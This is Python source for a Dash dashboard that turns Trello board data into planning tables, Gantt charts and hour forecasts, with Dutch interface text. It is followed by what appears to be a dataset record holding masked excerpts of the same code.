style=globals['styles']['tabs'],
children=[
html.Div(
className='tab3_div1',
style=globals['styles']['maindivs'],
children=[
html.H3('Uitleg'),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Markdown('''Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.'''),
dcc.Markdown('''In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.'''),
]
),
]
),
html.Div(
className='tab3_div2',
style=globals['styles']['maindivs'],
children=[
html.H4('Platte dump'),
dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
dash_table.DataTable(
id='table_plattedump',
columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],
data=data['dfs']['kaartendf'].to_dict('records'),
hidden_columns=[i for i in data['dfs']['columntypes']],
export_format='xlsx',
export_headers='display',
export_columns='all',
filter_action="native",
sort_action="native",
sort_mode="multi",
style_table={'overflowX': 'scroll'},
style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'},
)
]
),
html.Div(
className='tab3_div3',
style=globals['styles']['maindivs'],
children=[
html.H4('Uren per maand'),
dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),
dcc.Markdown('Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'),
dash_table.DataTable(
id='table_urenpermaand',
columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],
data=data['dfs']['urenpermaand'].to_dict('records'),
hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],
export_format='xlsx',
export_headers='display',
export_columns='all',
filter_action="native",
sort_action="native",
sort_mode="multi",
style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'},
)
]
),
]
),
dcc.Tab(
label='Langetermijnplanning',
style=globals['styles']['tabs'],
children=[
html.Div(
className='maindivs',
style=globals['styles']['maindivs'],
children=[
html.H3('Uitleg'),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Markdown('''In dit tabblad wordt een langetermijnplanning getoond.'''),
dcc.Markdown('''De focus hierbij ligt vooral op de categorieen.'''),
]
),
]
),
html.Div(
className='maindivs',
style=globals['styles']['maindivs'],
children=[
html.H4('Ingeplande uren per categorie'),
dcc.Dropdown(
style = globals['styles']['dropdowns'],
id='dropdownurenpermaand',
options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Categories')] if name != None],
multi=True,
searchable=False,
value = data['arrays'][config.get('Custom Field for Categories')]
),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(id='urenpermaand')
]
),
]
),
html.Div(
className='tab1_div3',
style=globals['styles']['maindivs'],
children=[
html.H4('Nog in te plannen uren (per lijst)'),
dcc.Markdown('''*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'''),
dcc.Markdown('''*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'''),
dcc.Markdown('''*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'''),
dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(
id='graph_nietingepland',
figure={'data': data['graphdata']['nietingepland'],
'layout': globals['graphlayouts']['bars']}
)
]
),
]
),
html.Div(
className='tab1_div4',
style=globals['styles']['maindivs'],
children=[
html.H4('Nog in te plannen uren (per epic)'),
dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(
id='graph_nietingepland_epics',
figure={'data': data['graphdata']['nietingeplandepics'],
'layout': globals['graphlayouts']['bars']}
)
]
),
]
),
]
),
dcc.Tab(
style=globals['styles']['tabs'],
label='Tactische planning',
children=[
html.Div(
className='maindivs',
style=globals['styles']['maindivs'],
children=[
html.H3('Uitleg'),
dcc.Markdown('''In dit tabblad is een middellange termijnplanning te zien.'''),
]
),
html.Div(
className='maindivs',
style=globals['styles']['maindivs'],
children=[
html.H4('Totalen'),
dcc.Markdown('''Hieronder staan twee totaaloverzichten van de aankomende maanden.'''),
dcc.Markdown('''De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'''),
dcc.Markdown('''Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'''),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(
figure=(data['graphdata']['gaugefig'])
)
]
)
]
),
html.Div(
className='maindivs',
style=globals['styles']['maindivs'],
children=[
html.H4('Gantt'),
dcc.Dropdown(
style = globals['styles']['dropdowns'],
id='dropdowngantttactisch',
options=[{'label':j, 'value': i} for i,j in data['arrays']['threemonths']],
multi=False,
searchable=False,
value = data['arrays']['threemonths'][0][0],
),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(id='gantttactisch'
)
]
)
]
),
]
),
# dcc.Tab(
# style=globals['styles']['tabs'],
# label='Configuratie',
# children=[
# html.Div(
# className='maindivs',
# style=globals['styles']['maindivs'],
# children=[
# html.H3('Uitleg'),
# dcc.Markdown('''Klik op de button hieronder om de huidige configuratie te downloaden.'''),
# html.A(id='export_link', href='/dash/configuration/', children=[html.Button(id='export_button', type='button', children=['Export'])]),
# dcc.Markdown('''Pas het bestand aan en upload deze hieronder.'''),
# dcc.Upload(
# id='configupload',
# children=html.Div([
# 'Sleep het bestand of ',
# html.A('selecteer het bestand')
# ]),
# style=globals['styles']['divgraphs'],
# multiple=False,
# ),
# html.Div(id='confirmupload',style=globals['styles']['divgraphs'])
# ]
# ),
# ]
# )
]
)
]
)
#---! gantttactisch
@app.callback(Output('gantttactisch', 'figure'),
[Input('dropdowngantttactisch','value')]
)
def update_gantttactisch(v1):
if v1 != None:
if v1[4:] == '12':
v1plus1 = str(int(v1[0:4])+1)+'01'
else:
v1plus1 = str(int(v1)+1)
if v1[4:] == '01':
v1min1 = str(int(v1[0:4])-1)+'12'
else:
v1min1 = str(int(v1)-1)
if v1[4:] == '11':
v1plus2 = str(int(v1[0:4])+1)+'01'
else:
v1plus2 = str(int(v1)+2)
import random
import numpy as np
from operator import itemgetter
ganttdata= []
monthkey = int(v1)
for i,j in data['kaarten'].items():
if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
try:
if int(datetime.strftime(j['Begindatum'], '%Y%m')) <= monthkey and int(datetime.strftime(j['Einddatum'], '%Y%m')) >= monthkey:
if j['Begindatum'].date() < datetime.strptime(v1min1+'01','%Y%m%d').date():
start=datetime.strptime(v1min1+'01','%Y%m%d').date()
else:
start = j['Begindatum'].date()
if j['Einddatum'].date() >= datetime.strptime(v1plus2+'01','%Y%m%d').date():
eind=datetime.strptime(v1plus2+'01','%Y%m%d').date()
else:
eind = j['Einddatum'].date()
ganttdata.append(dict(Task=j['Epic'],
Start=start,
Finish=eind,
Resource=j['Naam'] + ' (uren: ' + str(round(data['urenperdagperkaart'][j['Naam']]['urenperperiode'][v1])) + ')'
))
except:
pass
result = sorted(ganttdata, key=itemgetter('Task'))
rgb = []
for c in range(len(result)):
r = list(np.random.choice(range(256), size=3))
s2 = ','.join(map(str,r))
s1 = "rgb("
s3 = ")"
rgb.append(s1 + s2 + s3)
fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True, group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',)
fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4]+'-'+v1[4:]+'-01',v1[0:4]+'-'+v1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))
fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4]+'-'+v1plus1[4:]+'-01',v1plus1[0:4]+'-'+v1plus1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))
return fig
else:
return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
# #---! configupload
# @app.callback(Output('confirmupload', 'children'),
# [Input('configupload','contents')]
# )
# def confirm_upload(contents):
# global newconfig
# if contents is not None:
# try:
# newconfig = json.loads(base64.b64decode(contents[23:]).decode('ASCII'))
# d = {}
# for key,value in newconfig.items():
# if type(value) == list:
# d[key] = ''
# for i in value:
# if d[key] == '':
# d[key] += i
# else:
# if i == value[-1]:
# d[key] += (', '+i)
# else:
# d[key] = value
# return html.Div(
# id='returneddiv',
# style=globals['styles']['divgraphs'],
# children=[
# dcc.Markdown('''Check hieronder of de juiste data is ingevoerd. Klik daarna daaronder op 'Opslaan'.'''),
# dash_table.DataTable(
# style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
# style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'},
# columns=[{'name': 'Sleutel', 'id': 'Sleutel'}, {'name': 'Waarde', 'id': 'Waarde'}],
# data=[{'Sleutel': key, 'Waarde': value} for key, value in d.items()]
# ),
# html.Button(
# 'Opslaan',
# id='save_button',
# n_clicks=0
# ),
# html.Div(
# id='savedornot',
# )
# ]
# )
# except:
# return html.H5('Het bestand is incorrect. Download en upload opnieuw!')
# else:
# return
# #---! save-button
# @app.callback(Output('savedornot','children'),
# [Input('save_button','n_clicks'),])
# def save_fnct(n_clicks):
# if n_clicks > 0:
# with open('./configuration/configuration.txt','w') as outfile:
# json.dump(newconfig, outfile, indent=4, sort_keys=True)
# return 'Opgeslagen. Refresh de page.'
# else:
# return
#---! ganttpersoon
@app.callback(Output('ganttpersoon','figure'),
[Input('dropdownganttpersoon','value'),
Input('dropdownganttpersoonstatus', 'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i,j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'],
Start=j[config.get('Custom Field for Starting date')].date(),
Finish = j[config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']
))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',)
return fig
else:
return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
#---! ganttepics
@app.callback(Output('ganttepics','figure'),
[Input('dropdownganttepics','value')])
def update_ganttepics(value):
ganttdata = []
for i,j in data['kaarten'].items():
if j['Epic'] == value and j['Status'] != 'Archived':
try:
ganttdata.append(dict(Task=j['Naam'],
Start=j[config.get('Custom Field for Starting date')].date(),
Finish = j[config.get('Custom Field for Ending date')].date(),
Resource=j['Status']
))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',)
return fig
else:
return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
#---! urenpermaand callback
@app.callback(Output('urenpermaand', 'figure'),
[Input('dropdownurenpermaand', 'value')]
)
def update_urenpermaand(value):
layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
xaxis={'title': 'Datum', 'gridcolor': 'gray'},
yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})
bars = []
if 'Regulier werk' in value:
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == 'Regulier werk']),0))
bars.append(dict(x=data['arrays']['xaxis_months'],
y=yaxis,
name='Regulier werk',
line = {'shape': 'spline', 'smoothing': 0.4},
mode='lines+markers',
marker= {'symbol': 'triangle-up-open', 'size': 10},
stackgroup='one',
))
for categorie in data['arrays'][config.get('Custom Field for Categories')]:
if categorie in value and categorie != 'Regulier werk':
if categorie == None:
categorienaam = 'Geen categorie'
else:
categorienaam = categorie
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == categorie]),0))
bars.append(dict(x=data['arrays']['xaxis_months'],
y=yaxis,
name=categorienaam,
line = {'shape': 'spline', 'smoothing': 0.4},
mode='lines+markers',
marker= {'symbol': 'triangle-up-open', 'size': 10},
stackgroup='one',
))
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in data['beschikbareuren'].values()]),0))
bars.append(dict(name='Totaal beschikbare uren',
mode = 'lines',
x = data['arrays']['xaxis_months'],
y = yaxis,
size=10,
line = {'shape': 'spline', 'smoothing': 0.3, 'width':6, 'color': 'black'},
))
return {
'data': bars,
'layout': layout}
#--! App routes
@app.server.route("/dash/configuration/")
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename="configuration.txt",
as_attachment=True,
cache_timeout=0
)
#--! Check if this is the main app and if so, run Dash!
if __name__ == '__main__':
app.run_server(debug=False,host='0.0.0.0', port=8050)
|
flexible
|
{
"blob_id": "c5f41b69ac215bd661ee39bdc8c3119db9606ca8",
"index": 6020,
"step-1": "<mask token>\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n<mask token>\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n [config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get('Custom Field for Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n 